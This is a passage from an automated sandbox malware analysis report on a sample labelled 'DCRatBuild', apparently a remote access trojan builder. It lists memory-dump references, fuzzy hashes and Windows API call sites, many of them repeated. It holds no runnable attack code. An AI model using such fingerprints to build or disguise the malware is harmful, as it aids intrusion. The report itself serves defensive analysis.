                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e8510995caded15f5f189947eef7f816bdf6f266a30c648e0f7d655f2cf6fdd3
                                      • Instruction ID: f71e535a37402d2ca7a758f7842af2ffab9e67f839050388b547833ec244ee85
                                      • Opcode Fuzzy Hash: e8510995caded15f5f189947eef7f816bdf6f266a30c648e0f7d655f2cf6fdd3
                                      • Instruction Fuzzy Hash: 63B0129737C10B7C324852082C17DB7023CC0C0B60330412AB106D0041DA448CC97432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: a2c882c42e5f8904a7d688e9d780ebde50857e47a6b6c2305908250aeba7bc16
                                      • Instruction ID: 588280488e143a10ca09d2f1b440d7615221fea21fe213bb91e7581d78768357
                                      • Opcode Fuzzy Hash: a2c882c42e5f8904a7d688e9d780ebde50857e47a6b6c2305908250aeba7bc16
                                      • Instruction Fuzzy Hash: 42B012922AC1057C714CB1056C22F7B026CE4C0B20330411BB009C0146D4488C867932
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 595e066b9a9771d573729964299fce6eaf05d4a16cdca69998a3d8d9970b0878
                                      • Instruction ID: 1db48a2de6d20ba8ff56542a5cc2a299b1cd7c925f9bfa01b5d719e0118a82a1
                                      • Opcode Fuzzy Hash: 595e066b9a9771d573729964299fce6eaf05d4a16cdca69998a3d8d9970b0878
                                      • Instruction Fuzzy Hash: 2BB0129726C1016CB14C61086C12FB6123CC1C6B20330891EB609D0182D5809CC57832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 75e3df036b18c4f44fcd9967cbabdf2ff5cbb3d558e5e3d171e9aa1ee4b0821d
                                      • Instruction ID: 09c29b0ee8148410b8857bb280db0548062e209210fe4dc98d4571343c54999b
                                      • Opcode Fuzzy Hash: 75e3df036b18c4f44fcd9967cbabdf2ff5cbb3d558e5e3d171e9aa1ee4b0821d
                                      • Instruction Fuzzy Hash: F8B0129727C2016CB14C61086C12FB6123CC1C1B20330491FB209D0142D5809CC57832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: df449b04870e0c358c840eda80ca3e92ec76d41ef396df19436e9387bb942a6b
                                      • Instruction ID: afd9ff9a1133943a3f0d5b28ee4f65f50583dbfd4b4ac6c973088f1fb80b7dbe
                                      • Opcode Fuzzy Hash: df449b04870e0c358c840eda80ca3e92ec76d41ef396df19436e9387bb942a6b
                                      • Instruction Fuzzy Hash: 28B0129726C2057DB14C21046E12EB6123CC2C1B203304A1EB205E004295809CC57832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8f1fa1407cd1b550a0bf9492d0466d83d576191370f9fea4edad1479be86e831
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 8f1fa1407cd1b550a0bf9492d0466d83d576191370f9fea4edad1479be86e831
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 151759f3c29cb0eb73ede152fe48ac53fdb61b8b1ee619f9d35a4a1f7d19c8ed
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 151759f3c29cb0eb73ede152fe48ac53fdb61b8b1ee619f9d35a4a1f7d19c8ed
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 65e4c06b19e4bdd90aac913e6d20ad31404acf0bd6ca07916ef9b72e1364e196
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 65e4c06b19e4bdd90aac913e6d20ad31404acf0bd6ca07916ef9b72e1364e196
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c8e8f4d83e4134dfa3b88c5461a72824fe7ea584faf676508632abed3e61eb77
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: c8e8f4d83e4134dfa3b88c5461a72824fe7ea584faf676508632abed3e61eb77
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 5d5649beac332af328b6db5c1026e6a1274d72e4ef9b872df303f2b17a2db207
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 5d5649beac332af328b6db5c1026e6a1274d72e4ef9b872df303f2b17a2db207
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 56aecddfd006440a59d9e3333b47ea140f5216c2779755d76f4b1ec8f2d13f49
                                      • Instruction ID: 908ef4e4094abc01e19b2aad708008a1b43de1a1c70bd0e817d36cff2ec3ee16
                                      • Opcode Fuzzy Hash: 56aecddfd006440a59d9e3333b47ea140f5216c2779755d76f4b1ec8f2d13f49
                                      • Instruction Fuzzy Hash: B2A0029626D5057C714CB151AD26D7B126CD4D1B21730451AB50694145955859867831
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 728da12ff1256a13a815bf415b2422e1c62453284ed8c09f46002b2dfc41b851
                                      • Instruction ID: dbed972b2569498ebf3e0ed0d725f4428c9ea3385adb5a1419e4a4dee752e35a
                                      • Opcode Fuzzy Hash: 728da12ff1256a13a815bf415b2422e1c62453284ed8c09f46002b2dfc41b851
                                      • Instruction Fuzzy Hash: 7AA0029726D1077C710852556D17DB6123CD4C5B617314519B507940419A545DC57431
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 03aadead765f0f92867cda1766d22f7b0622beea5b75524d3fb19ed37f044ef6
                                      • Instruction ID: 4f0fcf398ddb066d020f8b59fa9f2d31fe4e878bbd11ece106c387970c425da2
                                      • Opcode Fuzzy Hash: 03aadead765f0f92867cda1766d22f7b0622beea5b75524d3fb19ed37f044ef6
                                      • Instruction Fuzzy Hash: E0A0029756D1067CB10C61556D16EB6123CC4C5B617304D1DB5069415155845DC57871
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 5d2845450b8718c00549863c7ee0ededa5add8cf274b3052d65cbe42d09cc676
                                      • Instruction ID: 4f0fcf398ddb066d020f8b59fa9f2d31fe4e878bbd11ece106c387970c425da2
                                      • Opcode Fuzzy Hash: 5d2845450b8718c00549863c7ee0ededa5add8cf274b3052d65cbe42d09cc676
                                      • Instruction Fuzzy Hash: E0A0029756D1067CB10C61556D16EB6123CC4C5B617304D1DB5069415155845DC57871
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,00F09104,?,?,-00001964), ref: 00F09EC2
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,00F1A587,C:\Users\user\Desktop,00000000,00F4946A,00000006), ref: 00F1A326
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F1B971
                                      • EndDialog.USER32(?,00000006), ref: 00F1B984
                                      • GetDlgItem.USER32(?,0000006C), ref: 00F1B9A0
                                      • SetFocus.USER32(00000000), ref: 00F1B9A7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F1B9E1
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F1BA18
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F1BA2E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F1BA4C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1BA5C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1BA78
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1BA94
                                      • _swprintf.LIBCMT ref: 00F1BAC4
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F1BAD7
                                      • FindClose.KERNEL32(00000000), ref: 00F1BADE
                                      • _swprintf.LIBCMT ref: 00F1BB37
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F1BB4A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F1BB67
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F1BB87
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1BB97
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1BBB1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1BBC9
                                      • _swprintf.LIBCMT ref: 00F1BBF5
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F1BC08
                                      • _swprintf.LIBCMT ref: 00F1BC5C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F1BC6F
                                        • Part of subcall function 00F1A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1A662
                                        • Part of subcall function 00F1A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E600,?,?), ref: 00F1A6B1
                                      Strings
                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F07191
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00F072F1
                                      • CloseHandle.KERNEL32(00000000), ref: 00F07301
                                        • Part of subcall function 00F07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07C04
                                        • Part of subcall function 00F07BF5: GetLastError.KERNEL32 ref: 00F07C4A
